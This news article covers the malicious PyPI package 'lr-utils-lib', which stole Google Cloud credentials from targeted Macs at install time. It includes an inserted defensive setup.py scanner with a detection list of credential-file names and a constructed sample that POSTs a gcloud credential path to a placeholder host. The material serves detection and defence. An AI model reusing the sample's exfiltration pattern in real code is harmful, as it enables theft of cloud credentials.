Malicious Python package targets macOS & GCP credentials
Checkmarx has announced that a malicious Python package is being utilised to target macOS developers and gain access to their Google Cloud Platform (GCP) accounts. Research Engineer Yehuda Gelb at Checkmarx recently discovered that the package "lr-utils-lib" was uploaded to PyPI in early June and contained malicious code that executes automatically upon installation.
Once activated on macOS, the code attempts to steal GCP credentials by sending them to a remote server. Checkmarx also identified an instance of CEO impersonation linked to the package owner. A fake LinkedIn profile for "Lucid Zenith" claimed falsely to be the CEO of Apex Companies, LLC, alluding to possible social engineering tactics.
Gelb explained, "In a recent investigation, we uncovered that the 'lr-utils-lib' Python package contained hidden malicious code. Upon installation, this code activates, targeting macOS systems and attempting to steal Google Cloud Platform credentials by sending them to a remote server."
The code is embedded within the setup.py file of the Python package, which allows it to execute automatically upon installation. Upon activation, the malware verifies that it is running on a macOS system, its main target. It then retrieves the IOPlatformUUID of the Mac device, a unique hardware identifier, and hashes it using the SHA-256 algorithm. This hash is compared against a predefined list of 64 Mac UUID hashes, indicating a highly targeted attack strategy and suggesting that the attackers had prior knowledge of their intended victims' systems.
The malware's data exfiltration process begins if a match is found in the hash list. It attempts to access two critical files within the ~/.config/gcloud directory: application_default_credentials.json and credentials.db, which typically contain sensitive Google Cloud authentication data. The malware then tries to transmit the contents of these files through HTTPS POST requests to a remote server identified as europe-west2-workload-422915[.]cloudfunctions[.]net. If successful, this data exfiltration could grant attackers unauthorised access to the victim's Google Cloud resources.
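The two paragraphs above describe the full install-time chain: code in setup.py, a platform check, a hardware-UUID hash lookup, reads of the gcloud credential files, and an HTTPS POST to a Cloud Functions host. A defender can triage a downloaded sdist for exactly those traits before installing it. The following script is an added example and is not Checkmarx's tooling or anything from the lr-utils-lib package: it parses a setup.py with Python's `ast` module and reports module-level imports of network or process modules, calls into those modules, and string literals that name the gcloud credential files, the IOPlatformUUID lookup, or a cloudfunctions.net host. The indicator lists and the two embedded setup.py samples are constructed for this example.

```python
"""Static triage of a package's setup.py for the install-time behaviour
described above. Constructed example: the indicator lists are this
author's assumptions, not Checkmarx's detection rules."""
import ast
from typing import List

# Modules that rarely belong at module scope in packaging metadata, because
# module-scope code in setup.py runs during `pip install` of an sdist.
SUSPECT_MODULES = {"requests", "urllib", "http.client", "socket",
                   "subprocess", "hashlib"}

# String fragments taken from the behaviour reported in the write-up.
SUSPECT_STRINGS = (".config/gcloud", "application_default_credentials.json",
                   "credentials.db", "IOPlatformUUID", "cloudfunctions.net")


def _dotted_name(node: ast.AST) -> str:
    """Render `a.b.c` from an Attribute/Name chain; '' if the callee is
    anything else (e.g. the result of another call)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_setup_py(source: str) -> List[str]:
    """Return human-readable findings for one setup.py source string."""
    findings: List[str] = []
    tree = ast.parse(source)

    # 1. Imports at module scope are executed at install time.
    for node in tree.body:
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            if name in SUSPECT_MODULES or name.split(".")[0] in SUSPECT_MODULES:
                findings.append(f"line {node.lineno}: module-level import of {name}")

    # 2. Calls that reach network/process/hashing APIs, anywhere in the file,
    # 3. and string literals naming credential files or the hardware UUID.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name and name.split(".")[0] in SUSPECT_MODULES:
                findings.append(f"line {node.lineno}: call to {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for needle in SUSPECT_STRINGS:
                if needle in node.value:
                    findings.append(f"line {node.lineno}: string mentions {needle!r}")
    return findings


def is_suspicious(source: str) -> bool:
    """Simple verdict: any finding at all warrants manual review."""
    return bool(scan_setup_py(source))


# Constructed sample: an ordinary setup.py with no install-time side effects.
BENIGN_SETUP = '''
from setuptools import setup, find_packages

setup(name="demo", version="0.1", packages=find_packages())
'''

# Constructed sample mirroring the reported pattern (platform check, hashed
# identifier, gcloud path, outbound POST). The host is a placeholder and the
# snippet does not read or send any real file.
SUSPICIOUS_SETUP = '''
import hashlib
import platform
import requests
from setuptools import setup

if platform.system() == "Darwin":
    marker = hashlib.sha256("IOPlatformUUID".encode()).hexdigest()
    target = "~/.config/gcloud/credentials.db"
    requests.post("https://placeholder.invalid/collect", data=target)

setup(name="demo", version="0.1")
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(f"== {label}: suspicious={is_suspicious(src)}")
        for finding in scan_setup_py(src):
            print("  ", finding)
```

Run it against the `setup.py` from a `pip download --no-binary :all: <package>` sdist before installing. Treat the output as triage, not proof: code placed in a custom `cmdclass` install hook, built from concatenated or base64-encoded strings, or passed to `exec` will not match these literals, so a clean report is a reason to look further rather than a clearance, and a wheel-only install avoids setup.py execution altogether but not code that runs at first import.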
Regarding the linked CEO impersonation, Gelb noted, "The social engineering aspect of this attack, while not definitively linked to the malware itself, presents an interesting dimension. A LinkedIn profile was discovered under the name 'Lucid Zenith', matching the name of the package owner. This profile falsely claimed that Lucid Zenith is the CEO of Apex Companies, LLC."
Queries to various AI-powered search engines about Lucid Zenith's position yielded inconsistent responses. Some AI platforms incorrectly confirmed the false information without mentioning the actual CEO. Gelb observed, "One AI-powered search engine, 'Perplexity', incorrectly confirmed the false information without mentioning the real CEO. Other AI platforms, to their credit, when repeatedly questioned about Lucid Zenith's role, correctly stated that he was not the CEO and provided the name of the actual CEO." This discrepancy underscores the potential risks of over-relying on a single AI source for verification.
The investigation highlights the need for critical scrutiny when installing third-party packages and when using AI-powered tools for information verification. This case underscores the importance of rigorous security practices, multi-source verification, and a critical approach to information gathering. Malicious actors could exploit weaknesses in AI-powered information retrieval and verification systems to their advantage.
Checkmarx continues to monitor suspicious activities in the open-source software ecosystem and promptly alerts customers to potential threats as part of its supply chain security solution. Checkmarx One customers are protected from this specific attack.